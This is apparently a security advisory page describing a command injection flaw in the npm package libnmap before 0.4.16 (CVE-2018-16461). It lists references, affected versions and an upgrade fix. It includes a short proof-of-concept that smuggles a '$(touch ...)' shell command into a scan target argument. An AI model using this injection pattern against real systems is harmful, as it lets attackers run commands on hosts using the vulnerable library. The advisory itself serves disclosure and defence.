Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdnMnctNnIyNS0yajdw
Command Injection in libnmap
Versions of libnmap before 0.4.16 are vulnerable to command injection.
Proof of concept
const nmap = require('libnmap');
const opts = {
range: [
'scanme.nmap.org',
"x.x.$(touch success.txt)"
]
};
nmap.scan(opts, function(err, report) {
if (err) throw new Error(err);
for (let item in report) {
console.log(JSON.stringify(report[item]));
}
});
Recommendation
Update to version 0.4.16 or later
Permalink: https://github.com/advisories/GHSA-7g2w-6r25-2j7pJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdnMnctNnIyNS0yajdw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 6 years ago
Updated: about 1 year ago
Identifiers: GHSA-7g2w-6r25-2j7p, CVE-2018-16461
References:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16461
- https://hackerone.com/reports/390865
- https://github.com/advisories/GHSA-7g2w-6r25-2j7p
- https://github.com/nodejs/security-wg/blob/master/vuln/npm/474.json
- https://www.npmjs.com/advisories/719
Affected Packages
npm:libnmap
Dependent packages: 10Dependent repositories: 37
Downloads: 736 last month
Affected Version Ranges: < 0.4.16
Fixed in: 0.4.16
All affected versions: 0.2.12, 0.2.15, 0.2.16, 0.2.17, 0.2.18, 0.2.19, 0.2.20, 0.2.21, 0.2.22, 0.2.23, 0.2.24, 0.2.25, 0.2.26, 0.2.27, 0.2.28, 0.2.29, 0.2.30, 0.2.31, 0.2.32, 0.2.33, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6, 0.3.7, 0.3.8, 0.3.9, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.13, 0.4.14, 0.4.15
All unaffected versions: 0.4.16, 0.4.19